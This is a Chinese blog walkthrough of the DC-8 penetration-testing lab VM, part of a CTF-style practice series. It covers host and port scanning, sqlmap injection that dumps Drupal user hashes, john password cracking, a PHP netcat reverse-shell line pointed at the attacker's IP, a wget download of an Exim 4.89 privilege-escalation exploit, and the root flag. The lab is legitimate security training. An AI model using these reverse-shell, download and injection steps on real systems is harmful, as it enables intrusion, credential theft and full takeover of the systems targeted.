Neos的渗透测试靶机练习——DC-8

Neos的渗透测试靶机练习——DC-8一次渗透测试练习 dc8 靶机


一、实验环境

虚拟机软件:VirtualBox 攻击机:kali linux(网卡初始为仅主机模式,要有安全意识) 靶机:DC-8(网卡初始为仅主机模式,要有安全意识) 

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切换为root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101
输入arp-scan -l扫描本网段存活主机,即靶机ip地址
靶机ip
可以看到靶机ip192.168.56.115,。
输入nmap -sV -p- 192.168.56.115扫描靶机所有端口开放情况
靶机端口
可以看到端口22、80是开放的。
浏览器输入192.168.56.115:80,发现是之前渗透遇到过的Drupal
dc-8
命令行输入whatweb -v 192.168.56.114查询网站指纹信息
网站指纹
可以看到一些关键信息,其中Drupal是一个内容管理系统(CMS),版本为7
输入dirsearch -u http://192.168.56.115:80,扫描网站目录。
发现有一大串,我们增加-i 200,只显示状态码为200的结果。
输入dirsearch -u http://192.168.56.115:80 -i 200,扫描结束,我们注意到扫描出来了登陆界面http://192.168.56.115/user/login/.
登陆界面
打开登陆界面,随便输入提交没有什么特别的回显,看来需要我们通过一些方式获得用户名密码然后登陆了。
注入点

2. sql注入

(1)测试注入点

页面左边Details板块中的三个页面,发现url中有参数nid可以尝试能不能注入。
提交参数
3改为单引号,发现回显错误信息,其中居然有sql语句
在这里插入图片描述
这已经算是敏感信息泄露了,我们继续尝试参数修改为1 and 1=1#1 and 1=2#
1 and 1=1#
在这里插入图片描述
发现此处确实有sql注入漏洞。

(4)sqlmap

我们使用针对sql注入的自动化工具sqlmap,输入sqlmap -u "http://192.168.56.115/?nid=1" --dbs --batch,其中--dbs爆破数据库--batch默认不需要确定
爆破数据库
等待一会儿,发现成功爆破出数据库d7dbinformaiotn_schema,其中d7db是用户自己创建的数据库,而information_schema是mysql版本5.0以下自带的数据库,保存用户信息。
我们继续输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db --tables --batch爆破d7db数据库的表名
user
发现出来一长串,其中有users表。我们针对users表继续爆破属性名
输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db -T users --columns,出来了结果。
属性名
其中name、pass应该是用户名密码,我们继续输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db -T users -C name,pass --dump
针对name、pass进行爆破。
用户名密码
爆破成功,有两个账户,adminjohn,密码是加密字符串。将这两个加密字符串写入一个文件passwd.txt,使用john工具进行爆破。

在这里插入图片描述
爆破出来了个turtle,经过尝试,是john的密码,admin的密码没有爆破出来,使用该用户名密码登陆网站成功。

用户john

3. PHP上传,反弹shell

经过浏览,发现可以上传PHP code。
PHP一句话
我们这里先命令行输入nc -lvvvp 4444监听本地4444端口,然后通过写一句话PHP代码:

<?php ("nc -e /bin/bash 192.168.56.101 4444"); ?> 

下方的save configuration保存,
在这里插入图片描述

最后重新提交Contact Us中的内容,反弹成功。
在这里插入图片描述
反弹

4. 提权

最后阶段了,往往都是要提权,经典操作,我们先输入python -c 'import pty;pty.spawn("/bin/bash")',切换成交互式shell。
在这里插入图片描述
然后输入find / -perm -u=s -type f 2>/dev/null查询可以以root权限执行的指令,这一步也是经典操作。
在这里插入图片描述
发现其中的exim4是一个有版本漏洞的工具,可以提权。我们先看看它的版本,输入/usr/sbin/exim4 --version查看版本。
在这里插入图片描述
好的看到版本号是4.89,我们搜索一下它的版本漏洞,输入searchsploit exim
在这里插入图片描述
发现有针对4.89版本的本地提权漏洞,那基本操作就是将46996.sh文件在靶机上运行即可。
我们先输入searchsploit -p /linux/local/46996.sh查找它的路径是什么。
在这里插入图片描述
然后根据其路径复制在当前目录上,输入cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh,然后打开一个http服务,输入python -m http.server 8800,8800为端口号。
在这里插入图片描述
然后靶机进入/tmp目录,输入wget http://192.168.56.101:8800/46996.sh ,将46996.sh传到靶机上。
在这里插入图片描述
上传成功,我们给46996.sh文件赋予权限777,使其得以执行。
在这里插入图片描述
经查看46996.sh文件内容,了解到其用法。
在这里插入图片描述
输入./46996.sh -m netcat,提权成功。
在这里插入图片描述
在/root目录下找到flag找到最终flag。
在这里插入图片描述

至此,渗透结束。


三、总结

本次渗透测试总体来讲感觉比较简单,基本都是我们之前用过的技巧,思路也基本相同,因为我们已经渐入佳境,慢慢的将一些操作变为本能,到哪一步干什么事,都变得愈发熟练起来,这正是我们逐渐变强的标志。


今天的文章 Neos的渗透测试靶机练习——DC-8分享到此就结束了,感谢您的阅读。
编程小号
上一篇 2024-12-12 11:01
下一篇 2024-12-12 10:57

相关推荐

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/bian-cheng-ji-chu/84514.html